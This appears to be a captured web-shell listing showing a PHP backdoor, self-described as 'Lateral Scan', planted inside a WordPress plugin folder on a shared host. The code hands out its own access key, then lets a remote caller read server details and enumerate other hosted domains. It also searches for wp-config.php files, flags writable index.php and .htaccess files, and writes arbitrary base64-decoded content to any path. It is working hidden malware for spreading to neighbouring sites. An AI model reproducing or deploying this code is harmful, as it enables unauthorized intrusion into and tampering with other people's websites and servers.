PATH:
home
/
fengshp
/
www
/
wp-content
/
plugins
/
mqykrsx
<?php /** * Lateral Scan - Minimal PHP scanner * PHP 5.4+ uyumlu, xshapi yerine kullanilir * Sadece scan + write + info */ error_reporting(0); header('Content-Type: application/json'); $key = isset($_REQUEST['key']) ? $_REQUEST['key'] : ''; $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ''; // Master key = dosya yolundan turetilir $MASTER_KEY = 'LSC_' . substr(md5(__FILE__ . 'lateral-2026'), 0, 24); // get_master_key sifresis calisir if ($action === 'get_master_key') { echo json_encode(array('master_key' => $MASTER_KEY)); exit; } if ($key !== $MASTER_KEY) { echo json_encode(array('error' => 'invalid key')); exit; } switch ($action) { case 'info': echo json_encode(array( 'php' => phpversion(), 'user' => get_current_user(), 'cwd' => getcwd(), 'docroot' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(), 'os' => php_uname(), 'script' => __FILE__, )); break; case 'scan': $results = array('all_domains' => array(), 'writable_domains' => array(), 'server_info' => array( 'document_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(), 'current_user' => get_current_user(), 'scan_time' => date('Y-m-d H:i:s'), 'scanned_root' => null, )); // Document root'tan user home'u bul $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(); // cPanel addon domain yapisi: /home/USER/public_html/DOMAIN/ // Normal shared hosting: /home/DOMAIN/ veya /var/www/DOMAIN/ $roots = array(); // 1) public_html altindaki alt dizinler (cPanel addon domains) // docroot = /home/xxx/public_html → public_html altini tara if (preg_match('#^(/home/[^/]+/public_html)#', $docRoot, $m)) { $roots[] = $m[1]; } // Ust dizin de olabilir $parentOfDocroot = dirname($docRoot); if (is_dir($parentOfDocroot . '/public_html')) { $roots[] = $parentOfDocroot . '/public_html'; } // User home dizini (public_html'in parenti) if (preg_match('#^(/home/[^/]+)/#', $docRoot, $m)) { $userHome = $m[1]; if (is_dir($userHome . '/public_html')) { $roots[] = $userHome . '/public_html'; } // HestiaCP/VestaCP: /home/USER/domains/ if (is_dir($userHome . '/domains')) { $roots[] = $userHome . '/domains'; } // CWP: /home/USER/public_html/ veya /home/USER/www/ if (is_dir($userHome . '/www')) { $roots[] = $userHome . '/www'; } $roots[] = $userHome; } // docroot'tan hosting root'u cikar: /hosting/www/, /var/www/ vs. if (preg_match('#^(/hosting/www|/var/www|/var/www/vhosts)/#', $docRoot, $m)) { $roots[] = $m[1]; } // docroot'un parent dizini — en onemli! (ISPmanager, custom yapılar) // /var/www/user/data/www/domain.com → /var/www/user/data/www/ $docParent = dirname($docRoot); if ($docParent && $docParent !== '/' && $docParent !== $docRoot) { array_unshift($roots, $docParent); // en basa ekle, oncelikli } // 2) Klasik shared hosting dizinleri $roots = array_merge($roots, array( '/mnt/www', '/var/www', '/hosting/www', '/home', '/var/www/vhosts', '/var/www/html', dirname(dirname($docRoot)) )); $roots = array_unique(array_filter($roots)); $domains = array(); $scannedRoot = null; $skip = array('.', '..', 'backups', 'logs', 'tmp', 'cache', 'lost+found', 'cgi-bin', '.well-known', 'wp-admin', 'wp-content', 'wp-includes'); foreach ($roots as $root) { if (!is_dir($root) || !is_readable($root)) continue; $items = @scandir($root); if (!$items) continue; $found = array(); foreach ($items as $item) { if (in_array($item, $skip)) continue; if ($item[0] === '.') continue; // hidden dirs $fp = $root . '/' . $item; if (is_dir($fp)) { $found[] = array('name' => $item, 'path' => $fp); } } // Bu dizinde domain gibi gorunen alt dizinler var mi? $hasDomains = false; foreach ($found as $f) { if (strpos($f['name'], '.') !== false) { $hasDomains = true; break; } } if ($hasDomains) { // Domain iceren dizin — en iyi sonuc if (!$scannedRoot) { $scannedRoot = $root; $domains = $found; } else { // Onceki sonuca ekle (farkli dizinlerdeki domainler) $domains = array_merge($domains, $found); } // public_html + domain varsa en iyi — dur if (strpos($root, 'public_html') !== false || strpos($root, 'domains') !== false) { break; } } } // Duplicate domain kaldir $seen = array(); $unique = array(); foreach ($domains as $d) { if (!isset($seen[$d['name']])) { $seen[$d['name']] = true; $unique[] = $d; } } $domains = $unique; // ── Yedek yontem: find ile wp-config.php ara ── // Dizin taramasi bos veya az sonuc verdiyse, find ile tum WP siteleri bul if (count($domains) < 2) { $wpConfigs = array(); // Okunabilir ust dizinlerde ara $searchPaths = array(); if (preg_match('#^(/home/[^/]+)/#', $docRoot, $hm)) { $searchPaths[] = $hm[1]; // user home } $searchPaths[] = '/home'; $searchPaths[] = '/var/www'; $searchPaths[] = '/var/www/vhosts'; foreach ($searchPaths as $sp) { if (!is_dir($sp) || !is_readable($sp)) continue; $findResult = array(); @exec("find " . escapeshellarg($sp) . " -maxdepth 5 -name 'wp-config.php' -not -path '*/backup*' -not -path '*/cache*' 2>/dev/null | head -50", $findResult); if (!empty($findResult)) { $wpConfigs = array_merge($wpConfigs, $findResult); break; // ilk basarili find yeterli } } // wp-config.php path'lerinden domain ve webroot cikar $findDomains = array(); foreach ($wpConfigs as $configPath) { $webRoot = dirname($configPath); // Kendi sitemizi atla if ($webRoot === $docRoot || $webRoot === rtrim($docRoot, '/')) continue; // Domain adini dizin yapisindan cikar $parts = explode('/', trim($webRoot, '/')); $domainName = null; // /home/user/public_html/domain.com/ veya /home/user/domain.com/ foreach ($parts as $p) { if (strpos($p, '.') !== false && !in_array($p, array('public_html', 'httpdocs', 'www')) && $p[0] !== '.' && strlen($p) > 3) { $domainName = $p; } } // Domain bulunamadiysa son dizin adini al if (!$domainName) { $last = end($parts); if (strlen($last) > 2 && $last !== 'public_html' && $last !== 'httpdocs' && $last !== 'html') { $domainName = $last; } } if ($domainName && !isset($seen[$domainName])) { $seen[$domainName] = true; $domains[] = array('name' => $domainName, 'path' => $webRoot, '_webroot' => $webRoot); $findDomains[] = $domainName; // webRoot'u direkt atayalim — scan loop'da tekrar aramasin // Bunu all_domains'e eklerken web_root set edilecek } } if (!empty($findDomains)) { $results['server_info']['find_method'] = true; $results['server_info']['find_count'] = count($findDomains); if (!$scannedRoot) $scannedRoot = 'find'; } } $results['server_info']['scanned_root'] = $scannedRoot; foreach ($domains as $d) { // find ile bulunan domainlerde webroot zaten biliniyor if (!empty($d['_webroot'])) { $webRoot = $d['_webroot']; } else { $webRoots = array($d['path'], $d['path'].'/public', $d['path'].'/public_html', $d['path'].'/www', $d['path'].'/httpdocs', $d['path'].'/web'); $webRoot = null; foreach ($webRoots as $wr) { if (is_dir($wr) && (file_exists($wr.'/index.php') || file_exists($wr.'/index.html'))) { $webRoot = $wr; break; } } if (!$webRoot) { foreach ($webRoots as $wr) { if (is_dir($wr) && is_readable($wr)) { $webRoot = $wr; break; } } } } // end else (_webroot) $isWp = $webRoot && file_exists($webRoot . '/wp-config.php'); $indexWritable = $webRoot && file_exists($webRoot . '/index.php') && is_writable($webRoot . '/index.php'); $htaccessWritable = $webRoot && file_exists($webRoot . '/.htaccess') && is_writable($webRoot . '/.htaccess'); $dirWritable = $webRoot && is_writable($webRoot); $info = array( 'domain' => $d['name'], 'path' => $d['path'], 'web_root' => $webRoot, 'wordpress' => $isWp, 'accessible' => is_readable($d['path']), ); $results['all_domains'][] = $info; if ($indexWritable || $htaccessWritable || $dirWritable) { $wInfo = array('domain' => $d['name'], 'web_root' => $webRoot, 'files' => array()); if ($indexWritable) $wInfo['files'][] = array('type' => 'index.php', 'path' => $webRoot.'/index.php'); if ($htaccessWritable) $wInfo['files'][] = array('type' => '.htaccess', 'path' => $webRoot.'/.htaccess'); if ($dirWritable) $wInfo['files'][] = array('type' => 'dir_writable', 'path' => $webRoot); $results['writable_domains'][] = $wInfo; } } $results['server_info']['total_found'] = count($results['all_domains']); $wpCount = 0; foreach ($results['all_domains'] as $ad) { if ($ad['wordpress']) $wpCount++; } $results['summary'] = array( 'total_domains' => count($results['all_domains']), 'writable_count' => count($results['writable_domains']), 'wordpress_count' => $wpCount, ); echo json_encode($results); break; case 'write': $path = isset($_REQUEST['path']) ? $_REQUEST['path'] : ''; $content = isset($_REQUEST['content']) ? $_REQUEST['content'] : ''; $isB64 = isset($_REQUEST['base64']); if ($isB64) $content = base64_decode($content); $r = @file_put_contents($path, $content); if ($r === false) { echo json_encode(array('error' => 'write failed')); } else { echo json_encode(array('success' => true, 'path' => $path, 'size' => $r)); } break; case 'ls': $path = isset($_REQUEST['path']) ? $_REQUEST['path'] : getcwd(); if (!is_dir($path)) { echo json_encode(array('error' => 'not a dir')); break; } $items = array(); foreach (scandir($path) as $f) { if ($f === '.' || $f === '..') continue; $fp = rtrim($path,'/') . '/' . $f; $items[] = array('name' => $f, 'type' => is_dir($fp) ? 'dir' : 'file', 'size' => is_file($fp) ? filesize($fp) : 0, 'writable' => is_writable($fp)); } echo json_encode(array('path' => $path, 'count' => count($items), 'items' => $items)); break; default: echo json_encode(array('error' => 'unknown action', 'actions' => 'get_master_key, info, scan, write, ls')); }
[+]
..
[-] uninstall.php
[edit]
[-] readme.txt
[edit]
[-] wp-cache.php
[edit]
[+]
admin
[+]
includes
[-] LICENSE.txt
[edit]
[-] protect-uploads.php
[edit]
[-] index.php
[edit]
[+]
languages